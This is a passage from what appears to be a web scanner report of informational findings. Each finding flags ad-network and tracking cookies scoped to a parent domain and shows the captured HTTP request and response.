HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=21d174dd-3f5d-459b-a330-ba895f3165fa3I5040; expires=Sat, 13-Aug-2011 13:23:20 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=0&RES=128&WMPV=0; expires=Sat, 13-Aug-2011 13:23:20 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:23:20 GMT
Connection: close
Content-Length: 0


13.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1686177&PluID=0&w=920&h=160&ord=[timestamp]&ucm=true&z=0 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orcon.net.nz/work/=&ref=iserve
Cookie: A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002iN4OaLyu0d9d00000; B3=98IM0000000000uz9v950000000001uz94DX0000000002uz; u2=e1292900-528b-4d66-83e8-593dd8b9e2433I004g; C4=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jy8xaLyu0drF00001iCYmaLtc0bnA00002cM5KaNgz0aR600001iN4OaLyu0d9d00000; expires=Sat, 13-Aug-2011 13:23:02 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=98IM0000000000uz6rGx0000000001uE9v950000000001uz94DX0000000002uz; expires=Sat, 13-Aug-2011 13:23:02 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:23:01 GMT
Connection: close
Content-Length: 1677

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

13.14. http://c7.zedo.com/bar/v16-406/c5/jsc/gl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-406/c5/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-406/c5/jsc/gl.js?lYrOTcGt89Yz1ao6zwEmLiof~051411 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=9;w=300;h=250;p=;q=index&t=6015
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; FFgeo=2241452

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Mon, 14 May 2012 18:35:37 GMT;domain=.zedo.com;path=/;
ETag: "867f4fee-5d7-4a1e2463e2000"
Vary: Accept-Encoding
X-Varnish: 545954212 545953506
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=99423
Expires: Mon, 16 May 2011 22:12:40 GMT
Date: Sun, 15 May 2011 18:35:37 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

13.15. http://cms.ad.yieldmanager.net/v1/cms

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cms.ad.yieldmanager.net
Path:   /v1/cms

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578&SIG=10vppft4v;x-cookie=rqa6d5q6g078o&o=4&f=x0 HTTP/1.1
Host: cms.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUACping.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 15 May 2011 18:35:55 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=134;path=/; expires=Tue, 02-Jun-2037 20:00:00 GMT;domain=.yieldmanager.net
Set-Cookie: S=s=dc3evvl6t078b&t=1305484555;path=/; expires=
Location: http://cmap.rm.ace.advertising.com/ycms.ashx?xid=oVQywpGM747YRJASw.Qng7lH
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 792

HTTP/1.1 302 Found
Date: Sun, 15 May 2011 18:35:55 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PU
...[SNIP]...

13.16. http://code.google.com/p/swfobject/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:35:37 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=7816bb4773bf94c0:TM=1305480937:LM=1305480937:S=KhHm7h3NK_FJFcaN; expires=Tue, 14-May-2013 17:35:37 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesit
...[SNIP]...

13.17. http://cookex.amp.yahoo.com/v2/cexposer/SIG=13ahi2098/*http%3A//cms.ad.yieldmanager.net/v1/cms

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cookex.amp.yahoo.com
Path:   /v2/cexposer/SIG=13ahi2098/*http%3A//cms.ad.yieldmanager.net/v1/cms

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v2/cexposer/SIG=13ahi2098/*http%3A//cms.ad.yieldmanager.net/v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578 HTTP/1.1
Host: cookex.amp.yahoo.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUACping.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 15 May 2011 18:35:55 GMT
Set-Cookie: B=c9crd3l6t078b&b=3&s=qs; expires=Tue, 15-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://cms.ad.yieldmanager.net/v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578&SIG=10vlhrtor;x-cookie=p9peq3y6g078o&o=4&f=3i
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 93

<!-- cookex2.cl2.ads.adx.ac4.yahoo.com uncompressed/chunked Sun May 15 18:35:55 UTC 2011 -->

13.18. http://ib.adnxs.com/getuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://cmap.an.ace.advertising.com/ancm.ashx?appnexus_uid=$UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUACping.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; uuid2=3420415245200633085; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu9]%)u#^pig7$WZVCh6[VnDM]EZ3hod8Fe@oQ$9==x(O*UO

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 16-May-2011 18:35:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sat, 13-Aug-2011 18:35:55 GMT; domain=.adnxs.com; HttpOnly
Location: http://cmap.an.ace.advertising.com/ancm.ashx?appnexus_uid=3420415245200633085
Date: Sun, 15 May 2011 18:35:55 GMT
Content-Length: 0


13.19. http://ib.adnxs.com/seg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add_code=impx-44127&member=30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu9]%)u#^pig7$WZVCh6[VnDM]EZ3hod8Fe@oQ$9==x(O*UO; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 16-May-2011 20:00:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sat, 13-Aug-2011 20:00:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sat, 13-Aug-2011 20:00:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu9]%)u#^pig7$WZVCh6[VnDM]EZ3hod8Fe@oQ$9==x(O*UO; path=/; expires=Sat, 13-Aug-2011 20:00:52 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sun, 15 May 2011 20:00:52 GMT

GIF89a.............!.......,........@..L..;

13.20. http://ic.tynt.com/b/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ic.tynt.com
Path:   /b/p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/p?id=aH4rgeyDqr35CXadbi-bpO&ts=1305489649099&t=Kosmix%3A%20The%20web%20organized%20for%20you HTTP/1.1
Host: ic.tynt.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 15 May 2011 20:00:53 GMT
Content-Type: image/gif
Content-Length: 35
Last-Modified: Fri, 16 Apr 2010 15:38:20 GMT
Connection: close
Cache-Control: "no-store, no-cache, must-revalidate, post-check=0, pre-check=0, false"
Expires: "Sat, 26 Jul 1997 05:00:00 GMT"
Set-Cookie: uid=CgUVZk3QMPV0vQoyDADuAg==; expires=Mon, 14-May-12 20:00:53 GMT; domain=tynt.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Accept-Ranges: bytes

GIF89a.............,...........D..;

13.21. http://m.adnxs.com/msftcookiehandler

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c= HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; uuid2=3420415245200633085; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]1]%)u#^pig7$W[c#Nv?q+O.JPTaAJ6dMys4SK'wFPAQFp.dMq!LfS)mzXh]:[^WX?#

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 16-May-2011 20:03:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sat, 13-Aug-2011 20:03:22 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sun, 15 May 2011 20:03:22 GMT

GIF89a.............!.......,........@..L..;

13.22. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=760374081;fpan=0;fpa=P0-1020015937-1305484533946;ns=0;url=http%3A%2F%2Fwww.tagged.com%2F%23;ref=;ce=1;je=1;sr=1920x1200x32;enc=n;ogl=;dst=1;et=1305484536868;tzo=300;a=p-96ZHBHvG56-qg HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=ELMBMAHgBoEQCroimFCoMKmRDNEGD7IJiRCIYA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://www.burstnet.com/enlightn/7110//820E/
Set-Cookie: d=EDQBMwHgBoEQCroimFCoMKmRDNEGD7IO1wqhCIYA; expires=Sat, 13-Aug-2011 18:35:36 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sun, 15 May 2011 18:35:36 GMT
Server: QS


13.23. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?nid=2146&put=xn7ja41kw4np53teeikidoecxeh9fu6s&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUACping.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:35:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=deleted; expires=Sat, 15-May-2010 18:35:55 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=deleted; expires=Sat, 15-May-2010 18:35:55 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; expires=Tue, 14-Jun-2011 18:35:56 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.24. http://r1-ads.ace.advertising.com/ctst=1/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /ctst=1/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ctst=1/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6015
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=DJ9zNFJwIsb0F7RqHjQCiZAc; ACID=oH320013054845430008; ASCID=oH320013054845430008

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.950393.704672.0XMC
Set-Cookie: C2=/zB0NFJwIsb0F8QqHjQCiZEY; domain=advertising.com; expires=Tue, 14-May-2013 18:35:43 GMT; path=/
Set-Cookie: F1=B8PHQ3kAAAAAgCsCAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:35:43 GMT; path=/
Set-Cookie: BASE=wwg5HQEgpLNiwLL!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:43 GMT; path=/
Set-Cookie: ROLL=qkAeqwzAXdC5GkA!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:43 GMT; path=/
Set-Cookie: 38037262=_4dd01cff,2878432453,704672^950393^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:35:43 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 600

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000704672/mnum
...[SNIP]...

13.25. http://r1-ads.ace.advertising.com/ctst=1/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /ctst=1/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ctst=1/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=8004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=DJ9zNFJwIsb0F7RqHjQCiZAc; ACID=qw280013054845430029; ASCID=qw280013054845430029

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:35:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.950393.776692.0XMC
Set-Cookie: C2=A0B0NFJwIsb0F8QqHjQCiZEY; domain=advertising.com; expires=Tue, 14-May-2013 18:35:44 GMT; path=/
Set-Cookie: F1=BAQHQ3EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:35:44 GMT; path=/
Set-Cookie: BASE=x7Q9Bi23SwnkpMN!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:44 GMT; path=/
Set-Cookie: ROLL=U6APDje2uuEWubJ!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:44 GMT; path=/
Set-Cookie: 75068257=_4dd01d00,5283448503,776692^950393^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:35:44 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 600

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum
...[SNIP]...

13.26. http://r1-ads.ace.advertising.com/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6015
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=DJ9zNFJwIsb0F7RqHjQCiZAc

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 15 May 2011 18:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://r1-ads.ace.advertising.com/ctst=1/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F
Set-Cookie: ACID=ga450013054845430017; domain=advertising.com; expires=Tue, 14-May-2013 18:35:43 GMT; path=/
Set-Cookie: ASCID=ga450013054845430017; domain=advertising.com; path=/
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:35:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 317

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://r1-ads.ace.advertising.com/ctst=1/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x12
...[SNIP]...

13.27. http://r1-ads.ace.advertising.com/site=705487/size=300250/u=2/bnum=43626829/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
